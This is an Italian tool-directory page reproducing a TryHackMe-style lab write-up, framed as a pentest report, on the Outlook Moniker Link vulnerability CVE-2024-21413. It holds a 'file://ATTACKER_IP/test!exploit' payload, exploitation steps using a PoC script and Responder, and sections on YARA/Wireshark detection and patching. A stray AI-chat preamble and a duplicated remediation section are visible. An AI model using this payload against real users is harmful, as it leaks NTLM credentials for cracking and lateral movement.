Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook- — Il 13 febbraio 2024 Microsoft ha pubblicato una grave vulnerabilità di sicurezza in Microsoft Outlook, che ha ricevuto l'identificativo CVE-2024-21413, ed è conosciuta come Moniker Link Vulnerability. La vulnerabilità consente a un attaccante di bypassare il meccanismo Protected View di Outlook. | Kitploit
Strumenti/GitHubGitHub/eylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-
Analisi delle VulnerabilitàExploitPenetration TestingApprendimento e FormazioneSicurezza EmailLab e Pratica
GitHubeylommaayan/thm---cve-2024-21413-moniker-link-microsoft-outlook-

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Vedi Repository
88 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →

Informazioni

Il 13 febbraio 2024 Microsoft ha pubblicato una grave vulnerabilità di sicurezza in Microsoft Outlook, che ha ricevuto l'identificativo CVE-2024-21413, ed è conosciuta come Moniker Link Vulnerability. La vulnerabilità consente a un attaccante di bypassare il meccanismo Protected View di Outlook.

Condividi

THM---CVE-2024-21413-Moniker-Link-Microsoft-Outlook-

Il 13 febbraio 2024 Microsoft ha pubblicato una grave vulnerabilità di sicurezza in Microsoft Outlook, identificata come CVE-2024-21413, nota come Moniker Link Vulnerability. La vulnerabilità consente a un attaccante di bypassare il meccanismo Protected View di Outlook. image

Ottimo 👍 Ecco traduzione completa + formulazione come report di Penetration Testing (PT), in ebraico professionale e chiaro. Come richiesto – solo traduzione e formulazione. Le risposte, le immagini e i completamenti li aggiungerai tu, e se vorrai in seguito – ti aiuterò.


Report di Penetration Testing

CVE-2024-21413 – Moniker Link (Microsoft Outlook)


🧩 Sommario Esecutivo

Il 13 febbraio 2024 Microsoft ha pubblicato una grave vulnerabilità di sicurezza in Microsoft Outlook, identificata come CVE-2024-21413, nota come Moniker Link Vulnerability.

La vulnerabilità consente a un attaccante di bypassare il meccanismo Protected View di Outlook utilizzando un link speciale (Moniker Link), e di indurre il client Outlook della vittima a inviare credenziali di autenticazione (hash NTLM) a un server controllato dall'attaccante – senza eseguire alcun file e senza un efficace avviso di sicurezza.

La vulnerabilità può portare a una perdita di credenziali ed esiste anche una possibilità teorica di esecuzione remota di codice (RCE) .


📌 Dettagli della vulnerabilità

ParametroValore
ID vulnerabilitàCVE-2024-21413
Data di pubblicazione13 febbraio 2024
ScopritoreHaifei Li – Check Point Research
ImpattoCredential Leak + RCE potenziale
GravitàCritical
Complessità attaccoBassa
Punteggio CVSS9.8
Link ufficialehttps://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2024-21413

🎯 Versioni interessate

La vulnerabilità interessa le seguenti versioni:

  • Microsoft Office LTSC 2021 – dalla versione 19.0.0
  • Microsoft 365 Apps for Enterprise – dalla versione 16.0.1
  • Microsoft Office 2019 – dalla versione 16.0.1
  • Microsoft Office 2016 – prima della versione 16.0.5435.1001

🎓 Obiettivi di apprendimento

  • Comprendere il funzionamento della vulnerabilità
  • Conoscere il meccanismo Protected View di Outlook
  • Sfruttare la vulnerabilità per la perdita di credenziali
  • Misure di rilevamento (Detection)
  • Raccomandazioni per la mitigazione (Mitigation)

(Vulnerability Description)

image

Microsoft Outlook consente la visualizzazione di email in formato HTML e l'analisi di vari tipi di link come http:// e https://. Inoltre, Outlook supporta anche link speciali chiamati Moniker Links, che consentono l'avvio di applicazioni o l'accesso a risorse esterne nel sistema operativo.

In condizioni normali, quando un'email contiene un link che avvia un'applicazione esterna o accede a una risorsa di sistema (come un link file://), viene attivato il meccanismo di sicurezza Protected View di Outlook. Questo meccanismo mostra un avviso di sicurezza e blocca azioni pericolose come l'esecuzione di codice, macro o l'accesso a risorse di rete esterne.

Tuttavia, è stata trovata una vulnerabilità in Outlook (CVE-2024-21413) che consente di bypassare il meccanismo Protected View mediante una semplice manipolazione di un link di tipo Moniker Link.

Cosa abbiamo trovato (Findings)

Durante il test è emerso che l'utilizzo di un link normale come:

file://ATTACKER_IP/test

fa sì che Outlook tenti di accedere a una risorsa di rete tramite il protocollo SMB, ma questo tentativo viene bloccato da Protected View.

Al contrario, quando il link include il carattere speciale ! e una stringa di testo aggiuntiva, ad esempio:

file://ATTACKER_IP/test!exploit

Outlook non attiva Protected View ed effettua un tentativo di connessione al server remoto.

Durante questo tentativo:

  • Outlook cerca di accedere alla risorsa tramite SMB
  • Viene effettuata una richiesta di autenticazione automatica
  • Le credenziali di accesso dell'utente vengono inviate all'attaccante
  • Viene catturato l'hash netNTLMv2 di Windows della vittima

È importante notare che la condivisione remota non deve necessariamente esistere, poiché il tentativo di autenticazione viene comunque effettuato.

Impatto (Impact)

La vulnerabilità consente all'attaccante di:

  • Perdita di credenziali utente (hash netNTLMv2)
  • Esecuzione di attacchi offline (Cracking / Pass-the-Hash)
  • Movimento laterale nella rete aziendale

Inoltre, poiché i Moniker Links utilizzano il meccanismo COM (Component Object Model) di Windows, esiste una possibilità teorica di esecuzione remota di codice (RCE). Tuttavia, alla data del test, non esiste un Proof of Concept pubblico per realizzare effettivamente RCE tramite questa vulnerabilità.

Sfruttamento della vulnerabilità (Exploitation)

Nell'ambito dell'attacco, viene inviata alla vittima un'email contenente un Moniker Link simile a quello mostrato nel compito precedente. L'obiettivo dell'attaccante è creare un'email con un link Moniker Link che bypassi il meccanismo Protected View di Outlook, in modo che quando la vittima fa clic sul link, il suo client Outlook tenti di caricare un file dalla macchina dell'attaccante. Questa azione fa sì che l'hash netNTLMv2 della vittima venga inviato e catturato dall'attaccante.

Prima di eseguire l'attacco, esamineremo un Proof of Concept (PoC) creato a scopo dimostrativo (disponibile anche su GitHub).

Author: CMNatic | https://github.com/cmnatic Version: 1.0 | 19/02/2024

Il codice utilizza il linguaggio Python e invia un'email HTML contenente un Moniker Link malevolo.

Descrizione del PoC

Il PoC:

  • Riceve un indirizzo email dell'attaccante e un indirizzo email della vittima
  • Richiede una password per l'autenticazione SMTP (in questa room, la password per [email protected] è: attacker)
  • Contiene il contenuto HTML dell'email (html_content) con un Moniker Link malevolo
  • Imposta i campi dell'email: Subject, From, To
  • Invia l'email tramite il server di posta
  • In uno scenario reale, è necessario un server SMTP sotto il controllo dell'attaccante (in questa room il server è già fornito).

Ascolto per la cattura dell'hash – Responder

Dopo l'invio dell'email, è necessario eseguire uno strumento di ascolto di tipo Responder sulla macchina dell'attaccante per catturare le richieste SMB.

Sull'AttackBox THM, il nome dell'interfaccia è ens5:

responder -I ens5

Responder ascolta le richieste SMB, LLMNR e NBT-NS e consente la cattura delle credenziali di autenticazione.

Apertura della macchina vittima

  • Aprire la macchina vittima tramite la finestra split-screen
  • Avviare Outlook
  • Selezionare l'opzione "I don't want to sign in or create an account"
  • Chiudere la finestra di inserimento della chiave prodotto
  • La casella di posta della vittima è già configurata in anticipo.

Esecuzione dell'Exploit

Sull'AttackBox:

  • Creare un nuovo file chiamato exploit.py

  • Incollare il codice del PoC

  • Prima dell'esecuzione, apportare le seguenti modifiche:

    • Aggiornare l'indirizzo IP della macchina dell'attaccante all'interno del Moniker Link (riga 12)

    • Sostituire il valore MAILSERVER con l'indirizzo:

      10.64.165.67

  • Quindi eseguire:

python3 exploit.py

  • Quando viene richiesta la password, inserire:

attacker

  • Se l'operazione ha avuto successo, verrà visualizzato il messaggio:

Email delivered

Risultato

Dopo aver aperto l'email sulla macchina vittima e aver fatto clic sul link "Click me":

  • Outlook tenta di connettersi alla macchina dell'attaccante tramite SMB
  • Responder cattura il tentativo di autenticazione
  • L'hash netNTLMv2 dell'utente viene catturato con successo
  • L'attacco è completato con successo.
image

Detection

YARA

È stata creata una regola YARA da Florian Roth con l'obiettivo di identificare email contenenti l'elemento file:\ all'interno di un Moniker Link – cosa che potrebbe indicare un tentativo di sfruttare CVE-2024-21413.

Esempio della regola YARA (come mostrato nella room):

  • La regola cerca caratteristiche generali dell'email (come Subject: e Received:)
  • Inoltre, cerca un pattern sospetto di link file:// che punti a un percorso UNC (\) insieme a un'estensione di file comune, includendo il carattere ! alla fine (caratteristica del bypass di Protected View)

(Il codice stesso rimane come nell'originale)

Wireshark

Inoltre, è possibile vedere la richiesta SMB che parte dalla macchina vittima verso la macchina dell'attaccante all'interno di una Packet Capture in Wireshark.

Durante la richiesta:

  • Viene effettuato un tentativo di autenticazione SMB
  • È possibile identificare un hash di tipo netNTLMv2 (a volte in forma troncata)

Remediation

Mitigazione e rafforzamento (Remediation)

Microsoft ha incluso aggiornamenti di sicurezza per questa vulnerabilità nell'ambito degli aggiornamenti Patch Tuesday di febbraio. È possibile consultare l'elenco degli articoli KB rilevanti in base alla versione di Office sul link ufficiale di Microsoft.

Si raccomanda vivamente di aggiornare Microsoft Office tramite:

  • Windows Update
  • Microsoft Update Catalog

Inoltre, fino al completamento degli aggiornamenti su tutti i sistemi, si tratta di un importante promemoria per l'implementazione di pratiche di sicurezza informatica di base, in particolare per aumentare la consapevolezza degli utenti, come:

  • Non fare clic su link casuali, specialmente da email inaspettate
  • Visualizzare l'anteprima dei link prima di fare clic
  • Segnalare email sospette al responsabile della sicurezza informatica dell'organizzazione

Poiché questa vulnerabilità bypassa il meccanismo Protected View di Outlook, non è possibile configurare Outlook per bloccare questo attacco solo tramite modifiche di configurazione.

Allo stesso modo, il blocco completo del protocollo SMB non è raccomandato nella maggior parte delle organizzazioni, poiché il protocollo è essenziale per l'accesso alle risorse di rete e alle condivisioni file. Tuttavia, potrebbe essere possibile implementare blocchi o restrizioni a livello di firewall, in base alla policy organizzativa e alla struttura della rete.

Mitigazione e rafforzamento (Remediation)

Microsoft ha incluso patch di sicurezza per questa vulnerabilità nell'ambito degli aggiornamenti Patch Tuesday di febbraio. È possibile consultare l'elenco degli articoli KB rilevanti in base alla versione di Office sul link ufficiale di Microsoft. Si raccomanda caldamente di aggiornare Microsoft Office tramite:

  • Windows Update
  • Microsoft Update Catalog

Inoltre, fino all'implementazione degli aggiornamenti su tutti i sistemi, si tratta di un importante promemoria per l'implementazione di pratiche di sicurezza informatica di base, in particolare per aumentare la consapevolezza degli utenti, come:

  • Evitare di fare clic su link casuali, specialmente da email inaspettate
  • Controllare l'indirizzo del link (Anteprima) prima di fare clic
  • Segnalare email sospette al responsabile della sicurezza informatica dell'organizzazione

Poiché questa vulnerabilità bypassa il meccanismo Protected View di Outlook, non è possibile prevenire l'attacco tramite modifiche di configurazione all'interno di Outlook stesso.

Allo stesso modo, il blocco completo del protocollo SMB non è raccomandato nella maggior parte delle organizzazioni, poiché il protocollo è essenziale per l'accesso alle condivisioni file e alle risorse di rete. Tuttavia, potrebbe essere possibile implementare restrizioni o blocchi a livello di firewall, in base alla policy di sicurezza e alla struttura della rete aziendale.

Scarica lo strumento